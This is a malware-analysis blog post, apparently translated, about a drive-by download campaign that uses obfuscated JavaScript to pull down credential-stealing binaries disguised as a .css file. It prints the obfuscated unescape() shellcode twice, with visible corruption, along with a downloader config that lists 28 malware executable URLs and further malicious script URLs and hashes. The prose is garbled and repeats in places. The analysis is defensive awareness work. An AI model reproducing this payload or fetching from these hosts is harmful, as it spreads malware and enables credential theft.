Exploitation of vulnerabilities through JS
Exploiting vulnerabilities across different types of file format has become commonplace and highly used method for the creators and disseminators of malware.
These methods, which are also combined with different strategies, they become a time bomb that is detonated by the simple act of accessing a page maliciously manipulated to accommodate these attack strategies.
Numerous cases such as using different weaknesses exploited through files .js, .swf, .pdf, .mp3, even pretending to be files .css, put on shows that any type of file is free to be used as channel spread much less as a vector for infection.
These methods, which are also combined with different strategies, they become a time bomb that is detonated by the simple act of accessing a page maliciously manipulated to accommodate these attack strategies.
Numerous cases such as using different weaknesses exploited through files .js, .swf, .pdf, .mp3, even pretending to be files .css, put on shows that any type of file is free to be used as channel spread much less as a vector for infection.
In recent weeks, a wave file. Js files are being used to redirect the download of malicious code through obfuscated scripts that hide in the body of the JavaScript, as the following, which is hosted at URL http://www710sese.cn/a1/realdadong.js whose md5 hash is d1094b907dfe99784b206d2ae9b1fe97:
var mybr = unescape (% u17eb% u6090% u645e% u0000% u30a1% u0800% U0500% uf88b% u0000%u00b9% u0004% uf300% uffa4%
ue8e0% uffe4% ua164% uffff% u0030% u0000% u408b% u8b0c%u1c70% u8bad% uec81% u0870% u0200% u0000% uec8b
ue8bb%%% u020f% u8503% u8b00 ub u0fc0%B85% u0000% uff00% ue903% u0221% u0000% u205d% u895b% u6856% cfu
98% u0e8a%ub1e8% u0000% u8900% u6856% u0c45% u4e8e% uec0e% ua3e8% u0000% u8900% u0445% u6856% u79c1
% ub8e5% u95e8% u0000% u8900 "+"% u1c45% uc61b% u6856% u7946% u87e8% u0000% u8900% u1045% u6856% UFCA
% u7c0d% u79e8% u0000% u8900% u0845% u84e7% u6856%ub469% u6be8% u0000% u8900% u1445% u020f% ue0bb%
uc7f6% u8900% u3303% u2845% u5255% u4D4C% u45c7% u4f2c% u004e% u285d% u8d00% uff53% u0455% u6850% u1a3
6% u702f% u3fe8% u0000% u8900% u2445% u7f6a% u5d8d% u55ff% u5328% u0544% uc71c% u5c28% u652e% uc778%u0
544% u652c% u0000% u5600% u287d% u8d56% uff57% uff56% u2075% u2455% u5756% u55ff%ue80c% u0062% u0000%
uc481% u0200% u0000% u3361% u0004% uc2c0% u8b55% u51ec% u8b53% u087d% u5d8b% u738b% u560c% u8b3c% u1
e74% u56f3% u0378% u768b% u0320% u33f3% uuad41% 49c9% u3356% uc303% u0ff6% u10be% uf23a% u0874% ucec1%
u030d% u40f2% uf uf1eb%u755e% E3B% u5ae5% ueb8b% u5a8b% u0324% u66dd% u0c8b% u8b4b% u1c5a% udd03% u04
8b% uu5ec5% 038b% uc25d% u595b% u0008% u92e9% u0000% u5e00% u80bf% ub900% u020c%u0100% u0000% ua4f3%
uec81% u0100% u0000% ufc8b% uc783% uc710% u6474% u6e07% uc76c% U0447% u006c% u0000% u0455% u458% uff57
9% uc724% u6c74% u5207% u0447% uc741% u6c6c% U636f% u47c7% u6108% u6574% uc748% u0c47% u6165% u0070% u
U55ff% 5057% u8b08% ub8f0% u0fe4% u0002% u07c7% u3089% u736d% u6376% u47c7% u7204% u0074% u5700% u55ff%
u8b04% u3c48% u8c8b% u8008% u0000% u3900% u0834% u0474% uf9e2% u12eb% u5508% u348d% u406a% u046th% uff5
6% u1055% u06c7% u0c80% uc481% u0002% u0100% u0000% ue8c3% uff69% uffff% u048b% u5324% u5251% u5756% UEC
b9% u020f% u8b00% u75db% u8519% u3350% u33c9% u83db% uub70f% 06e8% ufffb% u8118% u0015% u833e% U7500%
ub70f% u06e8% u8118% u0035% ufffb% U7500% U8330% ub70f% u02e8% u8318% u2575% u6afb% u8b04% uc083% ub830
u0fe0%% u0002% u0068% u0000% u6801% u0000% U1000% u10ff% u006a% u0689% u4489% u1824% uecb9%u020f% uff0
0% u5f01% u5a5e% u5b59% ue4b8% u020f% uff00% ue820% ufdda% uffff% u7468% u7074% u2f3a% u642f% u772e% u6965
% u632e% u6b78% u6d6f% u6e2f% u7765% u612f% u2e31% u7363% u0073);
ue8e0% uffe4% ua164% uffff% u0030% u0000% u408b% u8b0c%u1c70% u8bad% uec81% u0870% u0200% u0000% uec8b
ue8bb%%% u020f% u8503% u8b00 ub u0fc0%B85% u0000% uff00% ue903% u0221% u0000% u205d% u895b% u6856% cfu
98% u0e8a%ub1e8% u0000% u8900% u6856% u0c45% u4e8e% uec0e% ua3e8% u0000% u8900% u0445% u6856% u79c1
% ub8e5% u95e8% u0000% u8900 "+"% u1c45% uc61b% u6856% u7946% u87e8% u0000% u8900% u1045% u6856% UFCA
% u7c0d% u79e8% u0000% u8900% u0845% u84e7% u6856%ub469% u6be8% u0000% u8900% u1445% u020f% ue0bb%
uc7f6% u8900% u3303% u2845% u5255% u4D4C% u45c7% u4f2c% u004e% u285d% u8d00% uff53% u0455% u6850% u1a3
6% u702f% u3fe8% u0000% u8900% u2445% u7f6a% u5d8d% u55ff% u5328% u0544% uc71c% u5c28% u652e% uc778%u0
544% u652c% u0000% u5600% u287d% u8d56% uff57% uff56% u2075% u2455% u5756% u55ff%ue80c% u0062% u0000%
uc481% u0200% u0000% u3361% u0004% uc2c0% u8b55% u51ec% u8b53% u087d% u5d8b% u738b% u560c% u8b3c% u1
e74% u56f3% u0378% u768b% u0320% u33f3% uuad41% 49c9% u3356% uc303% u0ff6% u10be% uf23a% u0874% ucec1%
u030d% u40f2% uf uf1eb%u755e% E3B% u5ae5% ueb8b% u5a8b% u0324% u66dd% u0c8b% u8b4b% u1c5a% udd03% u04
8b% uu5ec5% 038b% uc25d% u595b% u0008% u92e9% u0000% u5e00% u80bf% ub900% u020c%u0100% u0000% ua4f3%
uec81% u0100% u0000% ufc8b% uc783% uc710% u6474% u6e07% uc76c% U0447% u006c% u0000% u0455% u458% uff57
9% uc724% u6c74% u5207% u0447% uc741% u6c6c% U636f% u47c7% u6108% u6574% uc748% u0c47% u6165% u0070% u
U55ff% 5057% u8b08% ub8f0% u0fe4% u0002% u07c7% u3089% u736d% u6376% u47c7% u7204% u0074% u5700% u55ff%
u8b04% u3c48% u8c8b% u8008% u0000% u3900% u0834% u0474% uf9e2% u12eb% u5508% u348d% u406a% u046th% uff5
6% u1055% u06c7% u0c80% uc481% u0002% u0100% u0000% ue8c3% uff69% uffff% u048b% u5324% u5251% u5756% UEC
b9% u020f% u8b00% u75db% u8519% u3350% u33c9% u83db% uub70f% 06e8% ufffb% u8118% u0015% u833e% U7500%
ub70f% u06e8% u8118% u0035% ufffb% U7500% U8330% ub70f% u02e8% u8318% u2575% u6afb% u8b04% uc083% ub830
u0fe0%% u0002% u0068% u0000% u6801% u0000% U1000% u10ff% u006a% u0689% u4489% u1824% uecb9%u020f% uff0
0% u5f01% u5a5e% u5b59% ue4b8% u020f% uff00% ue820% ufdda% uffff% u7468% u7074% u2f3a% u642f% u772e% u6965
% u632e% u6b78% u6d6f% u6e2f% u7765% u612f% u2e31% u7363% u0073);
The point is that, between the lines of this obfuscated script is executed to download a binary file from a different URL, called a1.css appears to be a .css (Cascading Style Sheets). This binary is a malware.
Furthermore, between the middle of all the infection process, which lasts only a few seconds, set against the splice connection txt.hsdee.com and www.wdswe.com, where, since the former makes a Drive-by Update on file oo.txt for when he replies with a 200 "OK", download the binaries provided in that file. The first one from http://www.wdswe.com/new/new1.exe (md5: 1c0b699171f985b1eab092bf83f2ad37).
The information is read into the text file is:
[file]
open = and
url1 = http://www.wdswe .com/new/new1. exe
url2 = http://www.wdswe .com/new/new2. exe
url3 = http://www.wdswe .com/new/new3. exe
url4 = http://www.wdswe .com/new/new4. exe
url5 = http://www.wdswe .com/new/new5. exe
url6 = http://www.wdswe .com/new/new6. exe
url7 = http://www.wdswe .com/new/new7. exe
url8 = http://www.wdswe .com/new/new8. exe
url9 = http://www.wdswe .com/new/new9. exe
url10 = http://www.wdswe .com/new/new10. exe
url11 = http://www.wdswe .com/new/new11. exe
url12 = http://www.wdswe .com/new/new12. exe
url13 = http://www.wdswe .com/new/new13. exe
url14 = http://www.wdswe .com/new/new14. exe
url15 = http://www.wdswe .com/new/new15. exe
url16 = http://www1.wdswe .com/new/new16. exe
url17 = http://www1.wdswe .com/new/new17. exe
url18 = http://www1.wdswe .com/new/new18. exe
url19 = http://www1.wdswe .com/new/new19. exe
url20 = http://www1.wdswe .com/new/new20. exe
url21 = http://www1.wdswe .com/new/new21. exe
url22 = http://www1.wdswe .com/new/new22. exe
url23 = http://www1.wdswe .com/new/new23. exe
url24 = http://www1.wdswe .com/new/new24. exe
url25 = http://www1.wdswe .com/new/new25. exe
url26 = http://www1.wdswe .com/new/new26. exe
url27 = http://www1.wdswe .com/new/new27. exe
url28 = http://www1.wdswe .com/new/new28. exe
count = 28
In this way the infection with several malicious codes, most of them designed to steal authentication credentials online games like WoW.
Some other URL's used to spread malware in the same way are:
http://97.haowyt .com / js / baidu. js
http://97.haowyt .com / js / baidu. js
http://www.163wyt .com / js / yahoo. js
http://www.710sese .cn/a1/hohogl. js
http://www.710sese .cn/a1/wokaono. js
http://www.710sese .cn/a1/woriniss. js
http://qq.18i16 .net / lzz. js
http://qq.18i16 .net / bf. js
http://qq.18i16 .net / realplay. js
http://qq.18i16 .net / new. js
http://qq.18i16 .net / cx. js
http://www.baomaaa .cn/a1/realdadong. jshttp://www.baomaaa .cn/a1/hohogl. js
http://www.baomaaa .cn/a1/wokaono. js
http://www.baomaaa .cn/a1/woriniss. js
http://tj.gan7788 .com / js / js. js
http://sss.2010wyt. net / r. js
http://sss.2010wyt .net/614. js
Despite the use, by malware creators of advanced techniques of infection, there is a fundamental element that can avoid becoming victims of similar attacks clearly focused on maintaining the updates completely current, including applications.
Related information
Drive-by Update to spread malware
New strategy to disseminate scareware IS
Massive exploitation of vulnerabilities through gh...
Danmec Bot, Fast-Flux networks and recruitment of ...
Schematic analysis of an attack from Web-based mal...
Jorge Mieres
0 comentarios:
Post a Comment